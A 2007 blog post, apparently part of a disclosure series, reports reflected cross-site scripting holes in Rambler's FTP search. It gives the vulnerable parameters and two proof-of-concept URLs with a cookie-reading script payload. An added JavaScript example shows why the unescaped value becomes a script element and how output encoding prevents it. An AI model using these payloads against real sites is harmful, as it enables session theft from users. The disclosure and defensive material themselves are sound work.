MOSEB-09 Bonus: Vulnerabilities at ftpsearch.rambler.ru

22:57 09.06.2007

New bonus vulnerabilities at Rambler. I found these Cross-Site Scripting holes on 01.06.2007. I found them while looking for other holes for the project, after Rambler untimely fixed some that I had prepared. Rambler needs to behave itself properly (when participating in the project).

The holes are at Rambler-FTP (ftpsearch.rambler.ru), in search results and advanced settings. These are XSS vulnerabilities like those in MOSEB-09: Vulnerabilities at Rambler (12 new holes in total).

Search results (search.html).

XSS:

The vulnerabilities are in the words, ftype, form, what and sort1 parameters:
http://ftpsearch.rambler.ru/db/ftpsearch/search.html?words=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Advanced settings (advanced.html).

XSS:

The vulnerabilities are in the words, pflx, pfli, dflx, dfli, sl and sh parameters:
http://ftpsearch.rambler.ru/db/ftpsearch/advanced.html?words=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Moral: searching on ftp can be dangerous.
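
Added example, not part of the original post and not Rambler's code: assuming advanced.html writes each parameter back into a double-quoted value attribute (an assumption drawn from the `">` prefix in the URL above), it shows why the raw value ends up as a script element and how HTML-encoding the output stops that. The function names and the form markup are hypothetical.

```javascript
// Added illustration. Assumption: the page echoes each query parameter
// into a double-quoted value="..." attribute of a form field.

// Parameters the post lists for advanced.html.
const ADVANCED_PARAMS = ["words", "pflx", "pfli", "dflx", "dfli", "sl", "sh"];

// Encode the characters that can close an attribute value or open a tag.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable rendering: the raw value is concatenated into the attribute.
function renderFieldRaw(name, value) {
  return `<input type="text" name="${name}" value="${value}">`;
}

// Hardened rendering: the value is encoded for the HTML attribute context.
function renderFieldEncoded(name, value) {
  return `<input type="text" name="${escapeHtml(name)}" value="${escapeHtml(value)}">`;
}

// Decode the query string and render one field per listed parameter.
function renderAdvancedForm(queryString, renderField) {
  const params = new URLSearchParams(queryString);
  return ADVANCED_PARAMS
    .map((p) => renderField(p, params.get(p) || ""))
    .join("\n");
}

// Rough check: did the reflected value survive as a real <script> element?
function containsScriptElement(html) {
  return /<script\b/i.test(html);
}

// Query string taken from the advanced.html URL in the post.
const query = "words=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E";

const rawHtml = renderAdvancedForm(query, renderFieldRaw);
const safeHtml = renderAdvancedForm(query, renderFieldEncoded);

console.log("raw output has <script>:    ", containsScriptElement(rawHtml));
console.log("encoded output has <script>:", containsScriptElement(safeHtml));
console.log(safeHtml.split("\n")[0]);
```

The encoding only holds when the template quotes the attribute value; an unquoted attribute can be left without any of the five encoded characters.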


2 responses to “MOSEB-09 Bonus: Vulnerabilities at ftpsearch.rambler.ru”

  1. Alex says:

    Thanks!

  2. MustLive says:

    Alex

    You are welcome.
